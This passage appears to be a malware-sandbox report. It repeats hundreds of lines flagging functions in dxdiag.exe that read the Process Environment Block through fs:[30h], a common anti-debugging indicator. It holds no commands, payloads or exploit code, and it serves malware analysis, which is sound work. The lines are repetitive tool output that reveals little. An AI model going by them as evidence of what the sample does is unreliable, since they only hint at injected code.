              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA9353 mov eax, dword ptr fs:[00000030h]25_2_23AA9353
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA9353 mov eax, dword ptr fs:[00000030h]25_2_23AA9353
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B32349 mov eax, dword ptr fs:[00000030h]25_2_23B32349
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC02A0 mov eax, dword ptr fs:[00000030h]25_2_23AC02A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC02A0 mov eax, dword ptr fs:[00000030h]25_2_23AC02A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC52A0 mov eax, dword ptr fs:[00000030h]25_2_23AC52A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC52A0 mov eax, dword ptr fs:[00000030h]25_2_23AC52A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC52A0 mov eax, dword ptr fs:[00000030h]25_2_23AC52A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC52A0 mov eax, dword ptr fs:[00000030h]25_2_23AC52A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B392BC mov eax, dword ptr fs:[00000030h]25_2_23B392BC
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B392BC mov eax, dword ptr fs:[00000030h]25_2_23B392BC
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B392BC mov ecx, dword ptr fs:[00000030h]25_2_23B392BC
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B392BC mov ecx, dword ptr fs:[00000030h]25_2_23B392BC
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B792A6 mov eax, dword ptr fs:[00000030h]25_2_23B792A6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B792A6 mov eax, dword ptr fs:[00000030h]25_2_23B792A6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B792A6 mov eax, dword ptr fs:[00000030h]25_2_23B792A6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B792A6 mov eax, dword ptr fs:[00000030h]25_2_23B792A6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B462A0 mov eax, dword ptr fs:[00000030h]25_2_23B462A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B462A0 mov ecx, dword ptr fs:[00000030h]25_2_23B462A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B462A0 mov eax, dword ptr fs:[00000030h]25_2_23B462A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B462A0 mov eax, dword ptr fs:[00000030h]25_2_23B462A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B462A0 mov eax, dword ptr fs:[00000030h]25_2_23B462A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B462A0 mov eax, dword ptr fs:[00000030h]25_2_23B462A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B472A0 mov eax, dword ptr fs:[00000030h]25_2_23B472A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B472A0 mov eax, dword ptr fs:[00000030h]25_2_23B472A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AEE284 mov eax, dword ptr fs:[00000030h]25_2_23AEE284
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AEE284 mov eax, dword ptr fs:[00000030h]25_2_23AEE284
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B30283 mov eax, dword ptr fs:[00000030h]25_2_23B30283
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B30283 mov eax, dword ptr fs:[00000030h]25_2_23B30283
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B30283 mov eax, dword ptr fs:[00000030h]25_2_23B30283
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AE329E mov eax, dword ptr fs:[00000030h]25_2_23AE329E
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AE329E mov eax, dword ptr fs:[00000030h]25_2_23AE329E
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B85283 mov eax, dword ptr fs:[00000030h]25_2_23B85283
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC02E1 mov eax, dword ptr fs:[00000030h]25_2_23AC02E1
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC02E1 mov eax, dword ptr fs:[00000030h]25_2_23AC02E1
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AC02E1 mov eax, dword ptr fs:[00000030h]25_2_23AC02E1
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B6F2F8 mov eax, dword ptr fs:[00000030h]25_2_23B6F2F8
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA92FF mov eax, dword ptr fs:[00000030h]25_2_23AA92FF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B852E2 mov eax, dword ptr fs:[00000030h]25_2_23B852E2
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED mov eax, dword ptr fs:[00000030h]25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED mov eax, dword ptr fs:[00000030h]25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED mov eax, dword ptr fs:[00000030h]25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED mov eax, dword ptr fs:[00000030h]25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED mov eax, dword ptr fs:[00000030h]25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED mov eax, dword ptr fs:[00000030h]25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED mov eax, dword ptr fs:[00000030h]25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED mov eax, dword ptr fs:[00000030h]25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED mov eax, dword ptr fs:[00000030h]25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED mov eax, dword ptr fs:[00000030h]25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED mov eax, dword ptr fs:[00000030h]25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED mov eax, dword ptr fs:[00000030h]25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED mov eax, dword ptr fs:[00000030h]25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B612ED mov eax, dword ptr fs:[00000030h]25_2_23B612ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ABA2C3 mov eax, dword ptr fs:[00000030h]25_2_23ABA2C3
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ABA2C3 mov eax, dword ptr fs:[00000030h]25_2_23ABA2C3
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ABA2C3 mov eax, dword ptr fs:[00000030h]25_2_23ABA2C3
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ABA2C3 mov eax, dword ptr fs:[00000030h]25_2_23ABA2C3
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ABA2C3 mov eax, dword ptr fs:[00000030h]25_2_23ABA2C3
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADB2C0 mov eax, dword ptr fs:[00000030h]25_2_23ADB2C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADB2C0 mov eax, dword ptr fs:[00000030h]25_2_23ADB2C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADB2C0 mov eax, dword ptr fs:[00000030h]25_2_23ADB2C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADB2C0 mov eax, dword ptr fs:[00000030h]25_2_23ADB2C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADB2C0 mov eax, dword ptr fs:[00000030h]25_2_23ADB2C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADB2C0 mov eax, dword ptr fs:[00000030h]25_2_23ADB2C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADB2C0 mov eax, dword ptr fs:[00000030h]25_2_23ADB2C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB92C5 mov eax, dword ptr fs:[00000030h]25_2_23AB92C5
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB92C5 mov eax, dword ptr fs:[00000030h]25_2_23AB92C5
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAB2D3 mov eax, dword ptr fs:[00000030h]25_2_23AAB2D3
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAB2D3 mov eax, dword ptr fs:[00000030h]25_2_23AAB2D3
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAB2D3 mov eax, dword ptr fs:[00000030h]25_2_23AAB2D3
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADF2D0 mov eax, dword ptr fs:[00000030h]25_2_23ADF2D0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADF2D0 mov eax, dword ptr fs:[00000030h]25_2_23ADF2D0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA823B mov eax, dword ptr fs:[00000030h]25_2_23AA823B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B85227 mov eax, dword ptr fs:[00000030h]25_2_23B85227
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AE7208 mov eax, dword ptr fs:[00000030h]25_2_23AE7208
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AE7208 mov eax, dword ptr fs:[00000030h]25_2_23AE7208
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA826B mov eax, dword ptr fs:[00000030h]25_2_23AA826B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B60274 mov eax, dword ptr fs:[00000030h]25_2_23B60274
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B60274 mov eax, dword ptr fs:[00000030h]25_2_23B60274
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B60274 mov eax, dword ptr fs:[00000030h]25_2_23B60274
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B60274 mov eax, dword ptr fs:[00000030h]25_2_23B60274
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B60274 mov eax, dword ptr fs:[00000030h]25_2_23B60274
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B60274 mov eax, dword ptr fs:[00000030h]25_2_23B60274
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B60274 mov eax, dword ptr fs:[00000030h]25_2_23B60274
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B60274 mov eax, dword ptr fs:[00000030h]25_2_23B60274
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B60274 mov eax, dword ptr fs:[00000030h]25_2_23B60274
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B60274 mov eax, dword ptr fs:[00000030h]25_2_23B60274
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B60274 mov eax, dword ptr fs:[00000030h]25_2_23B60274
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B60274 mov eax, dword ptr fs:[00000030h]25_2_23B60274
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB4260 mov eax, dword ptr fs:[00000030h]25_2_23AB4260
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB4260 mov eax, dword ptr fs:[00000030h]25_2_23AB4260
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB4260 mov eax, dword ptr fs:[00000030h]25_2_23AB4260
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD9274 mov eax, dword ptr fs:[00000030h]25_2_23AD9274
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B7D26B mov eax, dword ptr fs:[00000030h]25_2_23B7D26B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B7D26B mov eax, dword ptr fs:[00000030h]25_2_23B7D26B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AF1270 mov eax, dword ptr fs:[00000030h]25_2_23AF1270
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AF1270 mov eax, dword ptr fs:[00000030h]25_2_23AF1270
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B6B256 mov eax, dword ptr fs:[00000030h]25_2_23B6B256
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B6B256 mov eax, dword ptr fs:[00000030h]25_2_23B6B256
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AE724D mov eax, dword ptr fs:[00000030h]25_2_23AE724D
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA9240 mov eax, dword ptr fs:[00000030h]25_2_23AA9240
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA9240 mov eax, dword ptr fs:[00000030h]25_2_23AA9240
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB6259 mov eax, dword ptr fs:[00000030h]25_2_23AB6259
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAA250 mov eax, dword ptr fs:[00000030h]25_2_23AAA250
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B611A4 mov eax, dword ptr fs:[00000030h]25_2_23B611A4
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B611A4 mov eax, dword ptr fs:[00000030h]25_2_23B611A4
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B611A4 mov eax, dword ptr fs:[00000030h]25_2_23B611A4
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B611A4 mov eax, dword ptr fs:[00000030h]25_2_23B611A4
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ACB1B0 mov eax, dword ptr fs:[00000030h]25_2_23ACB1B0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AF0185 mov eax, dword ptr fs:[00000030h]25_2_23AF0185
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3019F mov eax, dword ptr fs:[00000030h]25_2_23B3019F
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3019F mov eax, dword ptr fs:[00000030h]25_2_23B3019F
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3019F mov eax, dword ptr fs:[00000030h]25_2_23B3019F
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B3019F mov eax, dword ptr fs:[00000030h]25_2_23B3019F
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAA197 mov eax, dword ptr fs:[00000030h]25_2_23AAA197
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAA197 mov eax, dword ptr fs:[00000030h]25_2_23AAA197
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAA197 mov eax, dword ptr fs:[00000030h]25_2_23AAA197
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B6C188 mov eax, dword ptr fs:[00000030h]25_2_23B6C188
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B6C188 mov eax, dword ptr fs:[00000030h]25_2_23B6C188
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD51EF mov eax, dword ptr fs:[00000030h]25_2_23AD51EF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD51EF mov eax, dword ptr fs:[00000030h]25_2_23AD51EF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD51EF mov eax, dword ptr fs:[00000030h]25_2_23AD51EF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD51EF mov eax, dword ptr fs:[00000030h]25_2_23AD51EF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD51EF mov eax, dword ptr fs:[00000030h]25_2_23AD51EF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD51EF mov eax, dword ptr fs:[00000030h]25_2_23AD51EF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD51EF mov eax, dword ptr fs:[00000030h]25_2_23AD51EF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD51EF mov eax, dword ptr fs:[00000030h]25_2_23AD51EF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD51EF mov eax, dword ptr fs:[00000030h]25_2_23AD51EF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD51EF mov eax, dword ptr fs:[00000030h]25_2_23AD51EF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD51EF mov eax, dword ptr fs:[00000030h]25_2_23AD51EF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD51EF mov eax, dword ptr fs:[00000030h]25_2_23AD51EF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD51EF mov eax, dword ptr fs:[00000030h]25_2_23AD51EF
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB51ED mov eax, dword ptr fs:[00000030h]25_2_23AB51ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AE01F8 mov eax, dword ptr fs:[00000030h]25_2_23AE01F8
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B861E5 mov eax, dword ptr fs:[00000030h]25_2_23B861E5
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B851CB mov eax, dword ptr fs:[00000030h]25_2_23B851CB
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B761C3 mov eax, dword ptr fs:[00000030h]25_2_23B761C3
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B761C3 mov eax, dword ptr fs:[00000030h]25_2_23B761C3
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AED1D0 mov eax, dword ptr fs:[00000030h]25_2_23AED1D0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AED1D0 mov ecx, dword ptr fs:[00000030h]25_2_23AED1D0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AE0124 mov eax, dword ptr fs:[00000030h]25_2_23AE0124
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB1131 mov eax, dword ptr fs:[00000030h]25_2_23AB1131
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB1131 mov eax, dword ptr fs:[00000030h]25_2_23AB1131
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAB136 mov eax, dword ptr fs:[00000030h]25_2_23AAB136
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAB136 mov eax, dword ptr fs:[00000030h]25_2_23AAB136
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAB136 mov eax, dword ptr fs:[00000030h]25_2_23AAB136
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAB136 mov eax, dword ptr fs:[00000030h]25_2_23AAB136
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B70115 mov eax, dword ptr fs:[00000030h]25_2_23B70115
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B5A118 mov ecx, dword ptr fs:[00000030h]25_2_23B5A118
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B5A118 mov eax, dword ptr fs:[00000030h]25_2_23B5A118
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B5A118 mov eax, dword ptr fs:[00000030h]25_2_23B5A118
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B5A118 mov eax, dword ptr fs:[00000030h]25_2_23B5A118
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B49179 mov eax, dword ptr fs:[00000030h]25_2_23B49179
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAF172 mov eax, dword ptr fs:[00000030h]25_2_23AAF172
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA9148 mov eax, dword ptr fs:[00000030h]25_2_23AA9148
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA9148 mov eax, dword ptr fs:[00000030h]25_2_23AA9148
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA9148 mov eax, dword ptr fs:[00000030h]25_2_23AA9148
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AA9148 mov eax, dword ptr fs:[00000030h]25_2_23AA9148
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B85152 mov eax, dword ptr fs:[00000030h]25_2_23B85152
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B44144 mov eax, dword ptr fs:[00000030h]25_2_23B44144
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B44144 mov eax, dword ptr fs:[00000030h]25_2_23B44144
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B44144 mov ecx, dword ptr fs:[00000030h]25_2_23B44144
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B44144 mov eax, dword ptr fs:[00000030h]25_2_23B44144
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B44144 mov eax, dword ptr fs:[00000030h]25_2_23B44144
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB7152 mov eax, dword ptr fs:[00000030h]25_2_23AB7152
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAC156 mov eax, dword ptr fs:[00000030h]25_2_23AAC156
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB6154 mov eax, dword ptr fs:[00000030h]25_2_23AB6154
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB6154 mov eax, dword ptr fs:[00000030h]25_2_23AB6154
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B760B8 mov eax, dword ptr fs:[00000030h]25_2_23B760B8
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23B760B8 mov ecx, dword ptr fs:[00000030h]25_2_23B760B8
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB208A mov eax, dword ptr fs:[00000030h]25_2_23AB208A
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AAD08D mov eax, dword ptr fs:[00000030h]25_2_23AAD08D
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AE909C mov eax, dword ptr fs:[00000030h]25_2_23AE909C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB5096 mov eax, dword ptr fs:[00000030h]25_2_23AB5096
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADD090 mov eax, dword ptr fs:[00000030h]25_2_23ADD090
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23ADD090 mov eax, dword ptr fs:[00000030h]25_2_23ADD090
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AB80E9 mov eax, dword ptr fs:[00000030h]25_2_23AB80E9
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD50E4 mov eax, dword ptr fs:[00000030h]25_2_23AD50E4
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 25_2_23AD50E4 mov ecx, dword ptr fs:[00000030h]25_2_23AD50E4
